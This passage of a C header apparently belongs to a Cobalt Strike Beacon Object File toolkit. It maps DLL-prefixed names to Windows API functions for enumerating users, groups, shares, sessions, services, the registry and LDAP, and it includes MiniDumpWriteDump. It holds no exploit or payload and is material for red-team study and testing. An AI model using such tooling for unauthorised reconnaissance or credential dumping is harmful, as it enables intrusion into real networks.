#define IPHLPAPI$GetNetworkParams GetNetworkParams 536 | #define IPHLPAPI$GetUdpTable GetUdpTable 537 | #define IPHLPAPI$GetTcpTable GetTcpTable 538 | #define IPHLPAPI$GetIpNetTable GetIpNetTable 539 | #define MSVCRT$calloc calloc 540 | #define MSVCRT$memcpy memcpy 541 | #define MSVCRT$memcmp memcmp 542 | #define MSVCRT$realloc realloc 543 | #define MSVCRT$free free 544 | #define MSVCRT$memset memset 545 | #define MSVCRT$sprintf sprintf 546 | #define MSVCRT$vsnprintf vsnprintf 547 | #define MSVCRT$_snwprintf _snwprintf 548 | #define MSVCRT$wcscpy_s wcscpy_s 549 | #define MSVCRT$wcslen wcslen 550 | #define MSVCRT$wcstombs wcstombs 551 | #define MSVCRT$sprintf sprintf 552 | #define MSVCRT$wcscmp wcscmp 553 | #define MSVCRT$wcstok wcstok 554 | #define MSVCRT$wcstok_s wcstok_s 555 | #define MSVCRT$wcsstr wcsstr 556 | #define MSVCRT$wcscat wcscat 557 | #define MSVCRT$wcsncat wcsncat 558 | #define MSVCRT$wcscpy wcscpy 559 | #define MSVCRT$_wcsicmp _wcsicmp 560 | #define MSVCRT$wcschr wcschr 561 | #define MSVCRT$wcsncat wcsncat 562 | #define MSVCRT$wcsrchr wcsrchr 563 | #define MSVCRT$wcsrchr wcsrchr 564 | #define MSVCRT$wcstoul wcstoul 565 | #define MSVCRT$strcat strcat 566 | #define MSVCRT$strnlen strnlen 567 | #define MSVCRT$strlen strlen 568 | #define MSVCRT$strcmp strcmp 569 | #define MSVCRT$strncmp strncmp 570 | #define MSVCRT$_stricmp _stricmp 571 | #define MSVCRT$strcpy strcpy 572 | #define MSVCRT$strstr strstr 573 | #define MSVCRT$strchr strchr 574 | #define MSVCRT$strtok strtok 575 | #define MSVCRT$strtok_s strtok_s 576 | #define MSVCRT$strtoul strtoul 577 | #define DNSAPI$DnsQuery_A DnsQuery_A 578 | #define DNSAPI$DnsFree DnsFree 579 | #define WSOCK32$inet_addr inet_addr 580 | #define WS2_32$closesocket closesocket 581 | #define WS2_32$connect connect 582 | #define WS2_32$freeaddrinfo freeaddrinfo 583 | #define WS2_32$getaddrinfo getaddrinfo 584 | #define WS2_32$htonl htonl 585 | #define WS2_32$htons htons 586 | #define WS2_32$inet_ntoa inet_ntoa 587 | #define WS2_32$ioctlsocket ioctlsocket 588 | #define WS2_32$select select 589 | #define WS2_32$socket socket 590 | #define WS2_32$__WSAFDIsSet __WSAFDIsSet 591 | #define WS2_32$WSAGetLastError WSAGetLastError 592 | #define NETAPI32$DsGetDcNameA DsGetDcNameA 593 | #define NETAPI32$NetUserGetInfo NetUserGetInfo 594 | #define NETAPI32$NetUserModalsGet NetUserModalsGet 595 | #define NETAPI32$NetServerEnum NetServerEnum 596 | #define NETAPI32$NetUserGetGroups NetUserGetGroups 597 | #define NETAPI32$NetUserGetLocalGroups NetUserGetLocalGroups 598 | #define NETAPI32$NetApiBufferFree NetApiBufferFree 599 | #define NETAPI32$NetGetAnyDCName NetGetAnyDCName 600 | #define NETAPI32$NetUserEnum NetUserEnum 601 | #define NETAPI32$NetGroupGetUsers NetGroupGetUsers 602 | #define NETAPI32$NetQueryDisplayInformation NetQueryDisplayInformation 603 | #define NETAPI32$NetLocalGroupEnum NetLocalGroupEnum 604 | #define NETAPI32$NetLocalGroupGetMembers NetLocalGroupGetMembers 605 | #define NETAPI32$NetUserSetInfo NetUserSetInfo 606 | #define NETAPI32$NetShareEnum NetShareEnum 607 | #define NETAPI32$NetWkstaUserEnum NetWkstaUserEnum 608 | #define NETAPI32$NetWkstaGetInfo NetWkstaGetInfo 609 | #define NETAPI32$NetStatisticsGet NetStatisticsGet 610 | #define NETAPI32$NetApiBufferFree NetApiBufferFree 611 | #define NETAPI32$NetSessionEnum NetSessionEnum 612 | #define MPR$WNetOpenEnumW WNetOpenEnumW 613 | #define MPR$WNetEnumResourceW WNetEnumResourceW 614 | #define MPR$WNetCloseEnum WNetCloseEnum 615 | #define MPR$WNetGetNetworkInformationW WNetGetNetworkInformationW 616 | #define MPR$WNetGetConnectionW WNetGetConnectionW 617 | #define MPR$WNetGetResourceInformationW WNetGetResourceInformationW 618 | #define MPR$WNetGetUserW WNetGetUserW 619 | #define MPR$WNetAddConnection2W WNetAddConnection2W 620 | #define MPR$WNetCancelConnection2W WNetCancelConnection2W 621 | #define USER32$EnumDesktopWindows EnumDesktopWindows 622 | #define USER32$IsWindowVisible IsWindowVisible 623 | #define USER32$GetWindowTextA GetWindowTextA 624 | #define USER32$GetClassNameA GetClassNameA 625 | #define USER32$CharPrevW CharPrevW 626 | #define USER32$FindWindowExA FindWindowExA 627 | #define USER32$SendMessageA SendMessageA 628 | #define USER32$GetWindowTextA GetWindowTextA 629 | #define USER32$GetClassNameA GetClassNameA 630 | #define USER32$EnumChildWindows EnumChildWindows 631 | #define SECUR32$GetUserNameExA GetUserNameExA 632 | #define SHLWAPI$StrStrIA StrStrIA 633 | #define SHLWAPI$SHFormatDateTimeA SHFormatDateTimeA 634 | #define ADVAPI32$OpenProcessToken OpenProcessToken 635 | #define ADVAPI32$GetTokenInformation GetTokenInformation 636 | #define ADVAPI32$ConvertSidToStringSidA ConvertSidToStringSidA 637 | #define ADVAPI32$ConvertStringSecurityDescriptorToSecurityDescriptorW ConvertStringSecurityDescriptorToSecurityDescriptorW 638 | #define ADVAPI32$LookupAccountSidA LookupAccountSidA 639 | #define ADVAPI32$LookupAccountSidW LookupAccountSidW 640 | #define ADVAPI32$LookupPrivilegeNameA LookupPrivilegeNameA 641 | #define ADVAPI32$LookupPrivilegeDisplayNameA LookupPrivilegeDisplayNameA 642 | #define ADVAPI32$OpenSCManagerA OpenSCManagerA 643 | #define ADVAPI32$OpenServiceA OpenServiceA 644 | #define ADVAPI32$QueryServiceStatus QueryServiceStatus 645 | #define ADVAPI32$QueryServiceConfigA QueryServiceConfigA 646 | #define ADVAPI32$CloseServiceHandle CloseServiceHandle 647 | #define ADVAPI32$EnumServicesStatusExA EnumServicesStatusExA 648 | #define ADVAPI32$QueryServiceStatusEx QueryServiceStatusEx 649 | #define ADVAPI32$QueryServiceConfig2A QueryServiceConfig2A 650 | #define ADVAPI32$ChangeServiceConfig2A ChangeServiceConfig2A 651 | #define ADVAPI32$ChangeServiceConfigA ChangeServiceConfigA 652 | #define ADVAPI32$CreateServiceA CreateServiceA 653 | #define ADVAPI32$DeleteService DeleteService 654 | #define ADVAPI32$RegOpenKeyExW RegOpenKeyExW 655 | #define ADVAPI32$EnumServicesStatusExW EnumServicesStatusExW 656 | #define ADVAPI32$RegCreateKeyA RegCreateKeyA 657 | #define ADVAPI32$RegSetValueExA RegSetValueExA 658 | #define ADVAPI32$RegOpenKeyExA RegOpenKeyExA 659 | #define ADVAPI32$RegConnectRegistryA RegConnectRegistryA 660 | #define ADVAPI32$RegCloseKey RegCloseKey 661 | #define ADVAPI32$RegOpenKeyA RegOpenKeyA 662 | #define ADVAPI32$RegCreateKeyExA RegCreateKeyExA 663 | #define ADVAPI32$RegDeleteKeyExA RegDeleteKeyExA 664 | #define ADVAPI32$RegDeleteKeyValueA RegDeleteKeyValueA 665 | #define ADVAPI32$RegQueryValueExA RegQueryValueExA 666 | #define ADVAPI32$RegQueryInfoKeyA RegQueryInfoKeyA 667 | #define ADVAPI32$RegEnumValueA RegEnumValueA 668 | #define ADVAPI32$RegEnumKeyExA RegEnumKeyExA 669 | #define ADVAPI32$RegDeleteValueA RegDeleteValueA 670 | #define ADVAPI32$RegQueryValueExW RegQueryValueExW 671 | #define ADVAPI32$RegSaveKeyExA RegSaveKeyExA 672 | #define ADVAPI32$GetFileSecurityW GetFileSecurityW 673 | #define ADVAPI32$GetSecurityDescriptorOwner GetSecurityDescriptorOwner 674 | #define ADVAPI32$GetSecurityDescriptorDacl GetSecurityDescriptorDacl 675 | #define ADVAPI32$GetAclInformation GetAclInformation 676 | #define ADVAPI32$GetAce GetAce 677 | #define ADVAPI32$LookupAccountSidW LookupAccountSidW 678 | #define ADVAPI32$ConvertSidToStringSidW ConvertSidToStringSidW 679 | #define ADVAPI32$MapGenericMask MapGenericMask 680 | #define ADVAPI32$OpenProcessToken OpenProcessToken 681 | #define ADVAPI32$GetTokenInformation GetTokenInformation 682 | #define ADVAPI32$InitializeSecurityDescriptor InitializeSecurityDescriptor 683 | #define ADVAPI32$SetSecurityDescriptorDacl SetSecurityDescriptorDacl 684 | #define ADVAPI32$ConvertSecurityDescriptorToStringSecurityDescriptorW ConvertSecurityDescriptorToStringSecurityDescriptorW 685 | #define ADVAPI32$StartServiceA StartServiceA 686 | #define ADVAPI32$ControlService ControlService 687 | #define ADVAPI32$EnumDependentServicesA EnumDependentServicesA 688 | #define ADVAPI32$RegQueryInfoKeyA RegQueryInfoKeyA 689 | #define NTDLL$NtCreateFile NtCreateFile 690 | #define NTDLL$NtClose NtClose 691 | #define IMAGEHLP$ImageEnumerateCertificates ImageEnumerateCertificates 692 | #define IMAGEHLP$ImageGetCertificateHeader ImageGetCertificateHeader 693 | #define IMAGEHLP$ImageGetCertificateData ImageGetCertificateData 694 | #define CRYPT32$CryptVerifyMessageSignature CryptVerifyMessageSignature 695 | #define CRYPT32$CertGetNameStringW CertGetNameStringW 696 | #define CRYPT32$CertGetCertificateContextProperty CertGetCertificateContextProperty 697 | #define CRYPT32$CertCreateCertificateContext CertCreateCertificateContext 698 | #define CRYPT32$CertFreeCertificateContext CertFreeCertificateContext 699 | #define CRYPT32$CertGetCertificateChain CertGetCertificateChain 700 | #define CRYPT32$CertFreeCertificateChain CertFreeCertificateChain 701 | #define CRYPT32$CryptFindOIDInfo CryptFindOIDInfo 702 | #define WS2_32$InetNtopW InetNtopW 703 | #define WS2_32$inet_pton inet_pton 704 | #define DNSAPI$DnsFree DnsFree 705 | #define DNSAPI$DnsGetCacheDataTable DnsGetCacheDataTable 706 | #define OLE32$CoInitializeEx CoInitializeEx 707 | #define OLE32$CoUninitialize CoUninitialize 708 | #define OLE32$CoInitializeSecurity CoInitializeSecurity 709 | #define OLE32$CoCreateInstance CoCreateInstance 710 | #define OLE32$CLSIDFromString CLSIDFromString 711 | #define OLE32$IIDFromString IIDFromString 712 | #define OLE32$StringFromGUID2 StringFromGUID2 713 | #define OLE32$CoSetProxyBlanket CoSetProxyBlanket 714 | #define OLE32$CoTaskMemAlloc CoTaskMemAlloc 715 | #define OLE32$CoTaskMemFree CoTaskMemFree 716 | #define OLEAUT32$SysAllocString SysAllocString 717 | #define OLEAUT32$SysReAllocString SysReAllocString 718 | #define OLEAUT32$SysFreeString SysFreeString 719 | #define OLEAUT32$SysStringLen SysStringLen 720 | #define OLEAUT32$VariantInit VariantInit 721 | #define OLEAUT32$VariantClear VariantClear 722 | #define OLEAUT32$SysAddRefString SysAddRefString 723 | #define OLEAUT32$VariantChangeType VariantChangeType 724 | #define OLEAUT32$VarFormatDateTime VarFormatDateTime 725 | #define OLEAUT32$SafeArrayDestroy SafeArrayDestroy 726 | #define OLEAUT32$SafeArrayLock SafeArrayLock 727 | #define OLEAUT32$SafeArrayGetLBound SafeArrayGetLBound 728 | #define OLEAUT32$SafeArrayGetUBound SafeArrayGetUBound 729 | #define OLEAUT32$SafeArrayGetElement SafeArrayGetElement 730 | #define OLEAUT32$SafeArrayGetElemsize SafeArrayGetElemsize 731 | #define OLEAUT32$SafeArrayAccessData SafeArrayAccessData 732 | #define OLEAUT32$SafeArrayUnaccessData SafeArrayUnaccessData 733 | 734 | 735 | 736 | 737 | /* 738 | #define CERTCLI$CAEnumFirstCA CAEnumFirstCA 739 | #define CERTCLI$CAEnumNextCA CAEnumNextCA 740 | #define CERTCLI$CACloseCA CACloseCA 741 | #define CERTCLI$CACountCAs CACountCAs 742 | #define CERTCLI$CAGetDN CAGetDN 743 | #define CERTCLI$CAGetCAProperty CAGetCAProperty 744 | #define CERTCLI$CAFreeCAProperty CAFreeCAProperty 745 | #define CERTCLI$CAGetCAFlags CAGetCAFlags 746 | #define CERTCLI$CAGetCACertificate CAGetCACertificate 747 | #define CERTCLI$CAGetCAExpiration CAGetCAExpiration 748 | #define CERTCLI$CAGetCASecurity CAGetCASecurity 749 | #define CERTCLI$CAGetAccessRights CAGetAccessRights 750 | #define CERTCLI$CAEnumCertTypesForCA CAEnumCertTypesForCA 751 | #define CERTCLI$CAEnumCertTypes CAEnumCertTypes 752 | #define CERTCLI$CAEnumNextCertType CAEnumNextCertType 753 | #define CERTCLI$CACountCertTypes CACountCertTypes 754 | #define CERTCLI$CACloseCertType CACloseCertType 755 | #define CERTCLI$CAGetCertTypeProperty CAGetCertTypeProperty 756 | #define CERTCLI$CAGetCertTypePropertyEx CAGetCertTypePropertyEx 757 | #define CERTCLI$CAFreeCertTypeProperty CAFreeCertTypeProperty 758 | #define CERTCLI$CAGetCertTypeExtensionsEx CAGetCertTypeExtensionsEx 759 | #define CERTCLI$CAFreeCertTypeExtensions CAFreeCertTypeExtensions 760 | #define CERTCLI$CAGetCertTypeFlagsEx CAGetCertTypeFlagsEx 761 | #define CERTCLI$CAGetCertTypeExpiration CAGetCertTypeExpiration 762 | #define CERTCLI$CACertTypeGetSecurity CACertTypeGetSecurity 763 | #define CERTCLI$CAGetCertTypeAccessRights CAGetCertTypeAccessRights 764 | #define CERTCLI$caTranslateFileTimePeriodToPeriodUnits caTranslateFileTimePeriodToPeriodUnits 765 | */ 766 | 767 | 768 | 769 | #define DBGHELP$MiniDumpWriteDump MiniDumpWriteDump 770 | #define WLDAP32$ldap_init ldap_init 771 | #define WLDAP32$ldap_bind_s ldap_bind_s 772 | #define WLDAP32$ldap_search_s ldap_search_s 773 | #define WLDAP32$ldap_count_entries ldap_count_entries 774 | #define WLDAP32$ldap_get_values_lenA ldap_get_values_lenA 775 | #define WLDAP32$ldap_value_free_len ldap_value_free_len 776 | #define WLDAP32$ldap_set_optionA ldap_set_optionA 777 | #define WLDAP32$ldap_search_init_pageA ldap_search_init_pageA 778 | #define WLDAP32$ldap_get_paged_count ldap_get_paged_count 779 | #define WLDAP32$ldap_get_next_page_s ldap_get_next_page_s 780 | #define WLDAP32$ldap_first_entry ldap_first_entry 781 | #define WLDAP32$ldap_next_entry ldap_next_entry 782 | #define WLDAP32$ldap_first_attribute ldap_first_attribute 783 | #define WLDAP32$ldap_count_values ldap_count_values 784 | #define WLDAP32$ldap_get_values ldap_get_values 785 | #define WLDAP32$ldap_value_free ldap_value_free 786 | #define WLDAP32$ldap_next_attribute ldap_next_attribute 787 | #define WLDAP32$ber_free ber_free 788 | #define WLDAP32$ldap_memfree ldap_memfree 789 | #define WLDAP32$ldap_unbind ldap_unbind 790 | #define WLDAP32$ldap_unbind_s ldap_unbind_s 791 | #define WLDAP32$ldap_msgfree ldap_msgfree 792 | #define RPCRT4$UuidToStringA UuidToStringA 793 | #define RPCRT4$RpcStringFreeA RpcStringFreeA 794 | #define PSAPI$EnumProcessModulesEx EnumProcessModulesEx 795 | #define PSAPI$GetModuleFileNameExA GetModuleFileNameExA 796 | #define VERSION$GetFileVersionInfoSizeA GetFileVersionInfoSizeA 797 | #define VERSION$GetFileVersionInfoA GetFileVersionInfoA 798 | #define VERSION$VerQueryValueA VerQueryValueA 799 | #define BeaconPrintf(x, y, ...) printf(y, ##__VA_ARGS__) 800 | #define internal_printf printf 801 | #endif 802 | --------------------------------------------------------------------------------